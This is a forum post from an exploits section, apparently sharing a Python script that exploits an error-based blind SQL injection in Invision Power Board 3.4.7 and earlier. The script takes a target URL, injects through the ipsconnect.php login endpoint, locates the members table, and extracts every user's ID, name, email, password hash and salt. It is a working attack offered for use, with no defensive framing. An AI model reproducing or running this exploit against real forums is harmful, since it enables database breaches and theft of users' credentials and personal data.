Jump to content
mp4

Invision Power Board 3.4.7 SQL Injection

By mp4, in Exploituri

Recommended Posts

mp4 Rookie

mp4

Posted
Posted 

#!/usr/bin/env python
# Sunday, November 09, 2014 - secthrowaway@safe-mail.net
# IP.Board <= 3.4.7 SQLi (blind, error based);
# you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable
# Script Modified by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs
print '\n\n---------------------------------------------------------------------------------'
print 'Script Modified by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs'
print '---------Script has been modified for different table prefix XXX_members---------'
print '---------------------------------------------------------------------------------\n\n\n'
url = raw_input('Enter URL http://www.exmaple.com/path_to_ipb :: ')
url = url.rstrip('/')
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

import sys, re
import urllib2, urllib

def inject(sql):
    try:
        urllib2.urlopen(urllib2.Request('%s/interface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and updatexml(NULL,concat (0x3a,(%s)),NULL)#\'' % sql), headers={"User-agent": ua}))
    except urllib2.HTTPError, e:
        if e.code == 503:
            data = urllib2.urlopen(urllib2.Request('%s/cache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
            txt = re.search("XPATH syntax error: '.*)'", data, re.MULTILINE)
            if txt is not None:
                return txt.group(1)
            sys.exit('Error [3], received unexpected data:\n%s' % data)
        sys.exit('Error [1]')
    sys.exit('Error [2]')

def get(name, table, num):
    sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
    s = int(inject('LENGTH((%s))' % sqli))
    if s < 31:
        return inject(sqli)
    else:
        r = ''
        for i in range(1, s+1, 31):
            r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
        return r


members_table= inject('SeLecT table_name from information_schema.tables where table_schema=database() and table_name REGEXP 0x6d656d6265727324 limit 0,1')
n = inject('SELECT COUNT(*) FROM %s' % members_table)
print '----------------------------------------------------------------------------'
print '* Found %s users' % n
print '----------------------------------------------------------------------------'
for j in range(int(n)):
        print '{:20s} {:20s}'.format('Id',get('member_id', members_table, j))
        print '{:20s} {:20s}'.format('Name',get('name', members_table, j))
        print '{:20s} {:20s}'.format('Email',get('email', members_table, j))
        print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', members_table, j))
        print '----------------------------------------------------------------------------'

Video: https://vimeo.com/111863081

Credit: Makman

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...